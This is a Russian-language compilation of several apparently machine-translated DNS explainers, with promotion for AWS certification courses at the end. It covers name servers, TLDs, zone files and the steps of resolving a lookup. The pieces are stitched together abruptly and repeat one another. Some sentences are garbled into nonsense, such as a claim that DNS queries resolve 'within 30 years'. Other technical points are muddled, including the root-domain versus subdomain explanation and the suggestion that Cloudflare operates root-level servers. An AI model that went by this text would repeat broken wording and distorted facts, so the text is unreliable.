Бесплатный DNS против платного DNS: в чем разница?

Обычно, когда пользователь посещает ваш веб-сайт из определенного региона мира, записи DNS вашего веб-сайта кэшируются ближайшими серверами имен, управляемыми местными интернет-провайдерами.

Это поможет другим пользователям из этого региона быстро перейти на ваш сайт.

Однако разрешение запросов DNS по-прежнему требует времени. Обычно это миллисекунды, и это не имеет особого значения для малых предприятий и блогов.

Вот почему большинство веб-сайтов просто используют DNS-серверы, предоставленные их хостинговой компанией или регистратором доменных имен.

Вы также можете использовать бесплатных поставщиков услуг DNS, таких как Cloudflare, которые предлагают более быстрый бесплатный DNS с ограниченной защитой брандмауэра.

Крупные компании обычно выбирают платный DNS, чтобы получить интеллектуальные функции, такие как 100% время безотказной работы, более высокая скорость поиска, перенаправление гео-трафика, вторичный DNS, повышенная безопасность и многое другое.

В WPBeginner мы используем DNSMadeEasy в качестве нашего DNS-провайдера, потому что они являются одними из самых быстрых в отрасли.

Мы надеемся, что эта статья помогла вам узнать все о DNS и о том, как это работает. Ознакомьтесь с дополнительными материалами ниже, чтобы узнать больше.

Вы также можете подписаться на наш канал YouTube для получения пошаговых видеоуроков по WordPress и подписаться на нас в Twitter и Facebook для получения последних обновлений.

Дополнительное чтение

Что такое DNS (система доменных имен)?

Не хотите смотреть?

Прочтите это:

Система доменных имен (или DNS) преобразует удобочитаемые доменные имена (например, www.google.com) в Интернет-протокол (IP). адреса (например: 173.194.39.78).

Компьютеры могут общаться только с помощью набора цифр, поэтому DNS был разработан как своего рода «телефонная книга», которая переводит домен, который вы вводите в браузере, в компьютерно-читаемый IP-адрес.

Краткая история DNS

Тридцать лет назад, когда Интернет был еще в зачаточном состоянии, когда вы хотели посетить веб-сайт, вам нужно было знать IP-адрес. адрес этого сайта. Это потому, что компьютеры могут и могли общаться только с помощью номеров.

Это IP-адрес: 127.33.54.200.

Это долго, трудно запомнить, и мы (я полагаю, люди) не роботы. Нам нужен был способ сделать компьютерно-читаемый информацию в удобочитаемый. И он должен был быть быстрым, легким и масштабируемым.

В начале 1980-х Пол Мокапетрис придумал систему, которая автоматически сопоставляла IP-адреса с доменными именами … и Так родился DNS.Эта же система до сих пор служит основой современного Интернета.

И все же лишь небольшая часть мира знает, что она существует, а еще меньшая группа понимает, что она делает. Реальный проблема в том, что люди, которым нужно знать, как это работает, и которые могут извлечь из этого пользу… не принимают время учиться.

Как это работает

Прежде чем мы перейдем к тому, как вы можете использовать DNS, нам нужно понять, как работает система.Мы уже знаем, что он отображает IP адреса к доменным именам, но где хранится эта информация? На серверах имен!

Серверы имен хранят записи DNS, которые представляют собой фактический файл, в котором говорится, что «этот домен» сопоставляется с «этим IP-адресом». Так есть ли комната где-нибудь, где есть все серверы имен и записи DNS для каждого сайта в Интернете? Нет… это было бы смешно.

На самом деле они распространены по всему миру.Эти серверы имен называются корневыми серверами имен и вместо хранения В каждом домене хранятся местоположения TLD (доменов верхнего уровня).

TLD — это два или три символа, например .com, которые заканчиваются доменным именем. У каждого TLD есть собственный набор серверов имен, которые хранят информация, в которой указано, кто уполномочен хранить записи DNS для этого домена.

Авторитетный сервер имен обычно является поставщиком DNS или регистратором DNS (например, GoDaddy, который предлагает оба DNS регистрация и хостинг).И здесь мы можем найти запись DNS, которая сопоставляет example.com с IP-адресом 127.66.122.88.

Большая картина

Соберем все вместе. Когда вы запрашиваете доменное имя, ваш первый шаг на самом деле не будет на корневых серверах имен. Вместо этого ваш браузер спросит у вашего локального разрешающего сервера имен, есть ли у него кешированные записи DNS для этого домена.

Разрешающим сервером имен обычно является ваш интернет-провайдер, а если это популярный веб-сайт, например, YouTube.com они, вероятно, будут иметь запись в их кеше. В этом случае вы пропустите остальную часть процесса поиска DNS.

Однако эти записи хранятся только в течение короткого периода времени. Всякий раз, когда вы создаете запись, у вас есть возможность установить TTL (время жизни). TTL сообщает разрешающим серверам имен, как долго они могут хранить информацию о записях. TTL может варьироваться от 30 секунд до недели.

Что делать, если запись, которую мы ищем, не кэшируется? Затем разрешающий сервер имен запросит у корневых серверов имен TLD для этого домена, который будет указывать на поставщика, уполномоченного размещать записи.

Хорошо, нужно было пройти много шагов, чтобы просто найти IP-адрес. Да, кстати, этот процесс происходит всего за пара миллисекунд. Небольшая перспектива, вы моргаете примерно за 50 миллисекунд. Вы можете разрешить большинство DNS-запросов до 30 лет.

Как работает DNS ?. Что происходит, когда вы набираете google.com… | Джулиан Вильегас | Основы Full Stack Engineering

Каждый раз, когда мы посещаем веб-страницу в нашем браузере, первое, что мы делаем, это находим совпадения в поисковой системе, такой как Google, или вводим полное имя страницы (оканчивающееся на.com) в верхней адресной строке; в случае успешного ответа сервера мы увидим красивую страницу со всем ее содержимым (в основном).

Прежде всего, давайте проясним, что такое

Это технология, которая переводит адаптированные для человека текстовые доменные имена в адаптированные для машины числовые IP-адреса. Когда пользователи вводят доменные имена в строку URL в своем браузере, серверы DNS отвечают за преобразование этих доменных имен в числовые IP-адреса, что приводит их на правильный веб-сайт.

Любой компьютер, подключенный к Интернету, может быть доступен через общедоступный IP-адрес, либо IPv4-адрес (например, 173. 194.121.32 ), либо IPv6-адрес (например, 2027: 0da8: 8b73: 0000: 0000: 8a2e: 0370: 1337 ).

Компьютеры могут легко обрабатывать такие адреса, но людям трудно узнать, кто управляет сервером или какие услуги предлагает веб-сайт. IP-адреса трудно запомнить и со временем они могут измениться.

Итак, на следующем изображении мы видим базовую работу DNS-сервера.

Веб-страница и весь ваш контент размещены на удаленном сервере, расположенном в любой точке мира, у него есть общедоступный IP-адрес, который идентифицирует его в Интернете. На предыдущем изображении DNS-сервер отвечает за возврат IP-адреса, соответствующего домену, а веб-сервер возвращает контент, запрошенный пользователем, с HTTP-ответом.

• Мы рассмотрим множество концепций, чтобы понять весь процесс.

IP-адрес — это то, что мы называем сетевым адресуемым местоположением.Каждый IP-адрес должен быть уникальным в своей сети. Когда мы говорим о веб-сайтах, эта сеть — это весь Интернет.

IPv4 , наиболее распространенная форма адресов, записывается в виде четырех наборов чисел, каждый из которых содержит до трех цифр, причем каждый набор разделен точкой. Например, «111.222.111.222» может быть действительным IP-адресом IPv4. С помощью DNS мы сопоставляем имя с этим адресом, чтобы вам не приходилось запоминать сложный набор чисел для каждого места, которое вы хотите посетить в сети.

TCP / IP : Протокол управления передачей и Интернет-протокол — это протоколы связи, которые определяют способ передачи данных через Интернет. Это как транспортные механизмы, позволяющие оформить заказ, пойти в магазин и купить товар. В нашем примере это похоже на машину или велосипед (или что-то еще, что вы можете обойти).

TCP определяет, как приложения могут создавать каналы связи в сети. Он также управляет тем, как сообщение собирается в более мелкие пакеты, прежде чем они будут переданы через Интернет и собраны в правильном порядке по адресу назначения.

IP определяет, как адресовать и маршрутизировать каждый пакет, чтобы убедиться, что он достигает правильного пункта назначения. Каждый компьютер-шлюз в сети проверяет этот IP-адрес, чтобы определить, куда пересылать сообщение.

Общие типы TCP / IP включают в себя следующее:

• HTTP (протокол передачи гипертекста) обеспечивает обмен данными между веб-сервером и веб-браузером.
• HTTPS (Secure HTTP) обеспечивает безопасную связь между веб-сервером и веб-браузером.
• FTP (протокол передачи файлов) обрабатывает передачу файлов между компьютерами.

Домен верхнего уровня

Доменное имя имеет простую структуру, состоящую из нескольких частей (это может быть только одна часть, две, три…), разделенных точками, и читается справа налево. :

Домен верхнего уровня, или TLD, является самой общей частью домена.Домен верхнего уровня — это самая дальняя часть справа (разделенная точкой). Обычными доменами верхнего уровня являются «com», «net», «org», «gov», «edu» и «io».

Доменное имя может иметь много меток (или компонентов). Не обязательно и не обязательно иметь 3 метки для формирования доменного имени. Например, www.inf.ed.ac.uk — допустимое доменное имя. Для любого контролируемого вами домена (например, jvillegas.tech) вы можете создавать «поддомены» с различным содержанием, расположенным на каждом, например web-01.jvillegas.tech или lb-01.jvillegas.tech.

«Разница между именем хоста и поддоменом заключается в том, что хост определяет компьютер или ресурс, а поддомен расширяет родительский домен. Это метод разделения самого домена ».

Корневой домен и субдомен — различия

Корневой домен является родительским доменом субдомена, и его имя не является и не может быть разделено точкой.

При создании любого домена на веб-сайте поставщика домена система поставщика всегда будет просить вас выбрать доменное имя без точки в имени.Другими словами, адрес корневого домена может быть mydomain.com , но никогда не может быть my.domain.com . Провайдеры доменов блокируют возможность создания такого корневого домена до тех пор, пока вы не введете имя без точки. Почему?

Точка в имени домена разделяет имя поддомена (часть имени перед точкой, например, www.my. ) и имя корневого домена (часть после точки, например .domain.com ). Это означает, что адрес my.domain.com является поддоменом корневого домена, имя которого — домен .com

Сервер имен

— это компьютер, предназначенный для преобразования доменных имен в IP-адреса. Эти серверы выполняют большую часть работы в системе DNS. Поскольку общее количество трансляций домена слишком велико для одного сервера, каждый сервер может перенаправить запрос на другие серверы имен или делегировать ответственность за подмножество поддоменов, за которые они несут ответственность.

Серверы имен могут быть «авторитетными», что означает, что они дают ответы на запросы о доменах, находящихся под их контролем.В противном случае они могут указывать на другие серверы или обслуживать кэшированные копии данных других серверов имен.

Файл зоны

Файл зоны — это простой текстовый файл, содержащий сопоставления между доменными именами и IP-адресами. Таким образом система DNS, наконец, определяет, с каким IP-адресом следует связаться, когда пользователь запрашивает определенное доменное имя.

Файлы зоны находятся на серверах имен и обычно определяют ресурсы, доступные в определенном домене, или место, куда можно перейти, чтобы получить эту информацию.

Записи

Записи хранятся в файле зоны. В простейшей форме запись представляет собой единственное сопоставление ресурса и имени. Они могут сопоставлять доменное имя с IP-адресом, определять серверы имен для домена, определять почтовые серверы для домена и т. Д.

Есть четыре сервера, которые работают вместе для доставки IP-адреса клиенту: рекурсивные преобразователи, корневые серверы имен, серверы имен TLD и авторитетные серверы имен.

Рекурсор DNS (также называемый преобразователем DNS) — это сервер, который получает запрос от клиента DNS, а затем взаимодействует с другими серверами DNS для поиска правильного IP-адреса.Как только преобразователь получает запрос от клиента, преобразователь фактически ведет себя как сам клиент, запрашивая другие три типа DNS-серверов в поисках правильного IP-адреса.

DNS по своей сути является иерархической системой. В верхней части этой системы находятся так называемые «корневые серверы». Эти серверы контролируются различными организациями и делегированы полномочиями ICANN (Интернет-корпорация по присвоению имен и номеров).

Сейчас в эксплуатации 13 корневых серверов.Однако, поскольку каждую минуту нужно разрешать невероятное количество имен, каждый из этих серверов фактически зеркалируется. Что интересно в этой настройке, так это то, что все зеркала для одного корневого сервера имеют один и тот же IP-адрес. Когда запросы сделаны для определенного корневого сервера, запрос будет перенаправлен на ближайшее зеркало этого корневого сервера.

Корневые серверы обрабатывают запросы информации о доменах верхнего уровня. Поэтому, если поступает запрос о том, что сервер имен более низкого уровня не может разрешить, делается запрос к корневому серверу для домена.

Корневые серверы фактически не знают, где размещен домен. Однако они смогут направить инициатора запроса на серверы имен, которые обрабатывают специально запрошенный домен верхнего уровня.

Таким образом, если запрос «www.wikipedia.org» направлен на корневой сервер, корневой сервер не найдет результат в своих записях. Он проверит свои файлы зоны на предмет соответствия «www.wikipedia.org». Не найдет.

Вместо этого он найдет запись для «org» TLD и предоставит запрашивающему объекту адрес сервера имен, ответственного за «org» адреса.

Сначала преобразователь запрашивает корневой сервер имен. Корневой сервер — это первый шаг в преобразовании (разрешении) удобочитаемых доменных имен в IP-адреса. Затем корневой сервер отвечает преобразователю с адресом DNS-сервера домена верхнего уровня (TLD) (например, .com или .net), который хранит информацию для своих доменов.

Затем преобразователь запрашивает сервер TLD. Сервер TLD отвечает IP-адресом полномочного сервера имен домена.Затем рекурсор запрашивает авторитетный сервер имен, который отвечает IP-адресом исходного сервера.

Наконец, распознаватель передаст клиенту IP-адрес исходного сервера. Используя этот IP-адрес, клиент может затем инициировать запрос непосредственно к исходному серверу, и исходный сервер ответит, отправив данные веб-сайта, которые могут быть интерпретированы и отображены веб-браузером.

Руководство по работе DNS

Что такое DNS? Его можно просто понять как книгу данных в Интернете.Некоторые также называют это цифровой телефонной книгой. Пользователи, как правило, собирают информацию через Интернет через доменное имя. В случае браузеров связь происходит через IP или адрес интернет-протокола.

Таким образом, такие вопросы, как DNS, можно просто понять, поскольку DNS преобразует доменные имена в IP-адреса, чтобы браузеры могли предоставлять веб-ресурсы. Что такое DNS и как он работает — один из наиболее часто задаваемых вопросов в наше время? В следующих отрывках каждый аспект обсуждается с максимальной ясностью и самым простым из возможных способов.

Готовитесь к сертификации AWS? Ознакомьтесь с нашими учебными курсами по сертификации AWS!

В любом случае, нужно сначала понять, что каждое устройство, подключенное к Интернету, имеет явный IP-адрес, который другие устройства используют для его распознавания. Итак, самый простой ответ на вопрос, что такое DNS и как он работает, — это то, что DNS-серверы снимают нагрузку с человеческой памяти по сохранению IP-адреса. В следующем резюме шаг за шагом обсуждается, как работает DNS, для лучшего понимания.

Основы работы DNS?

Метод разрешения DNS — это просто преобразование имен хостов в удобный для системы IP-адрес. Как правило, каждому устройству предоставляется IP-адрес, как описано выше. По мере того, как пользователь загружает веб-страницу, становится важным, чтобы вводимые пользователем данные переводились в форму, понятную браузеру.

Это означает, что для поиска соответствующей веб-страницы необходим удобный для устройства адрес. Это похоже на основную вещь, которую нужно понять, прежде чем переходить к шаг за шагом в том, как работает DNS.Важно хорошо разбираться в различных аппаратных сегментах, связанных с теми, через которые должен проходить DNS-запрос, прежде чем понимать метод, лежащий в основе разрешения DNS.

В случае браузеров процесс проверки DNS происходит сзади и не требует взаимодействия с устройством пользователя, кроме первого запроса.

Если вы совсем не знакомы с термином DNS, прочтите нашу предыдущую статью о записях DNS, чтобы узнать основы.

Типы DNS-серверов, связанных с загрузкой веб-страницы

Прежде чем понять, как работает DNS-сервер, важно сначала узнать о различных типах DNS-серверов, связанных с процессом загрузки веб-страницы. Ниже приведены 4 DNS-сервера, связанные с загрузкой веб-страницы.

1. DNS-рекурсор

Рекурсор DNS — это просто отдел, который часто просят найти что-то в его пределах. Чтобы понять, как DNS-сервер работает технически, сначала следует понять, что это в первую очередь сервер, предназначенный для сбора запросов с устройства клиента через веб-браузеры и приложения.Это связано с выполнением дополнительных запросов, чтобы предоставить исчерпывающий ответ на запрос DNS. Этот фундаментальный аспект следует понять, прежде чем переходить к тому, как работает DNS.

2. Корневой сервер имен

Этот сервер является начальным этапом преобразования имен хостов в форму, понятную пользователям, в форме IP-адресов. Его можно рассматривать как указатель, указывающий на различные сегменты коллекции. Короче говоря, он работает как справочник для различных целевых направлений.Это можно понять как первый шаг к вопросам, например, как работает DNS.

3. Сервер имен TLD

Сервер имен TLD или сервер домена верхнего уровня можно рассматривать как определенный сегмент коллекций в пределах всей базы данных. Это самый важный шаг в процессе поиска определенного IP-адреса. Кроме того, он содержит последний раздел имени хоста или просто такие, как «.com» или «.in». Эти мелочи важны для понимания того, как работает DNS.

4. Авторитетный сервер имен

Приходя к авторитетному серверу имен, его основная цель — просто переводить. В более широком смысле, это помогает в переводе определенного термина в виде определения. Это последний шаг в поиске, выполняемом на сервере имен. В случае, если полномочный сервер имен получает доступ к запрошенным или запрошенным записям, он просто собирается вернуть IP-адрес для соответствующего имени хоста в рекурсоре DNS, который обработал первый запрос.

Итак, это четыре DNS-сервера, которые нужно понимать, чтобы знать, как работает DNS.

Виртуальное частное облако (VPC) также является важной темой при подготовке к сертификации AWS. Вот основы виртуального частного облака (VPC).

Отличительные признаки авторитетного DNS-сервера и рекурсивного DNS-преобразователя

Это очень фундаментальный вопрос, который необходимо понять, прежде чем вдаваться в подробности того, как работает DNS. Можно просто понять, что и сервер, и преобразователь серверов указывают на набор серверов, которые объединены с моделью DNS, хотя каждый из них действует по-своему и остается в другом месте назначения в списке запроса DNS.Чтобы упростить задачу, можно понять, что рекурсивный преобразователь появляется в начальной точке DNS-запроса, а полномочный сервер имен появляется в конечном итоге в конечной точке.

Прежде чем вдаваться в подробности того, как работает DNS, важно понять функциональные возможности рекурсивного преобразователя DNS. В этом контексте можно просто рассматривать рекурсивный преобразователь как систему, которая отвечает на рекурсивные запросы, сделанные через клиентов, а также предоставляет детали записи DNS посредством надлежащего отслеживания.

Он заставляет это происходить через цепочку запросов, пока не встретит полномочный сервер имен для запрошенной записи. Он просто выдает сигнал об ошибке в случае, если запись не получена, или также может отображаться время ожидания. Это ключевой аспект, который необходимо понимать для правильного понимания того, как работает DNS.

В любом случае, хорошая новость заключается в том, что рекурсивный преобразователь DNS не является существенным для выполнения нескольких запросов на наличие записей, необходимых для ответа на запрос клиента. Непосвященные должны понимать, что кэширование — это в первую очередь процесс сохранения данных, который помогает выполнять короткие замыкания для необходимых запросов, предоставляя ресурсы, запрошенные ранее через поиск DNS.

К счастью, рекурсивные преобразователи DNS не всегда должны делать несколько запросов, чтобы отслеживать записи, необходимые для ответа клиенту; кэширование — это процесс сохранения данных, который помогает сократить необходимые запросы, обслуживая запрошенную запись ресурса ранее в поиске DNS.

Как и в случае с рекурсией, очень важно понимать функции авторитетного DNS-сервера, чтобы понять, как работает DNS. Это наиболее важный сервер, который практически хранит и отвечает за учет ресурсов DNS. Это сервер, который находится в конце очереди поиска DNS, который будет отвечать на записанные запросы.

В конечном итоге он позволяет веб-браузерам при выполнении запросов находить IP-адрес, необходимый для доступа к веб-сайту или дополнительным ресурсам Интернета. Это сервер, который может выполнять запросы на основе собственных данных независимо от других источников. Это лучший источник самых сложных записей. Это ключевой аспект, который необходимо понимать, чтобы хорошо знать, как работает DNS.

Это здесь, чтобы отметить, что случаи, когда запрос для поддомена, дополнительного сервера имен, добавляется с авторитетным сервером имен, который несет основную ответственность за сохранение деталей CNAME поддомена. Помимо этих деталей, очень важно понимать разницу между службами DNS и спецификой, предоставляемой Cloudflare, чтобы хорошо понимать, как работает DNS.

Cloudflare отвечает за обслуживание серверов имен базового уровня, которые очень сильно связаны с работой сети. Сеть серверов f-root может быть хорошим примером в этом контексте. Этот непосвященный f-root является одним из основных разделов базового уровня DNS-сервера имен, который отвечает за большое количество запросов и запросов, выполняемых через Интернет ежедневно.

Также читайте: CNAME против псевдонима

Ключевые шаги поиска в DNS

В большинстве случаев DNS связан с доменным именем, которое превращается в правильный IP-адрес.

Шаг 1: Прежде всего, пользователь вводит «xyz.com ’в браузере, и запрос идет в Интернете и перехватывается рекурсивным преобразователем DNS.

Это преобразователь, который запрашивает корневой сервер имен DNS (.).

Шаг 2: Затем корневой сервер отвечает резолверу DNS-сервера домена верхнего уровня (TLD) в форме .com или .net, который хранит данные для соответствующих доменов.

Шаг 3: Затем преобразователь передает запрос TLD .com.

Шаг 4: На следующем шаге сервер TLD возвращает ответ с IP-адресом сервера имен домена.

Шаг 5: Наконец, рекурсивный преобразователь доставляет запрос на сервер имен домена.

Шаг 6: Затем IP-адрес xyz.com доставляется обратно распознавателю через сервер имен.

Шаг 7: На следующем шаге распознаватель DNS передает веб-браузеру IP-адрес доменного имени, который запрашивается в первую очередь.

Шаг 8: После того, как вышеупомянутые шаги для DNS доставили IP-адрес xyz.com, браузеру, наконец, удается запросить соответствующую веб-страницу.

Браузер здесь запрашивает в виде HTTP на IP-адрес. В конечном итоге сервер соответствующего IP-адреса возвращает веб-страницу, которая будет доставлена ​​в браузере.

Также читайте: Общие сведения об эфемерных портах на примере

Заключительные слова

Итак, это все об основах DNS (сервера доменных имен) и о том, как он работает. Несомненно, эта статья будет полезна для вас по управлению DNS. Как упоминалось выше, роль DNS заключается в преобразовании доменных имен в IP-адреса. Он также содержит список почтовых серверов, которые принимают электронные письма для каждого доменного имени.

Если вы являетесь профессионалом в области AWS, вам обязательно нужно понимать концепцию системы доменных имен. Это также важная тема при подготовке сертификатов AWS. Если вы готовитесь к какой-либо сертификации AWS, мы рекомендуем вам записаться на наши учебные курсы по сертификации AWS и дать вашей подготовке новое преимущество.Мы предлагаем множество профессиональных курсов AWS, таких как: AWS DevOps , AWS Cloud Practitioner, экзамен , AWS Security Certification , AWS Certified Developer Associate , AWS Certified Solutions Architect etc .. Наши онлайн-курсы обучения и практические тесты помогут вам сдать сертификационный экзамен в первую очередь пытаться. Для получения дополнительной помощи мы также предоставляем полное руководство Guide к экзамену помощника архитектора решений AWS.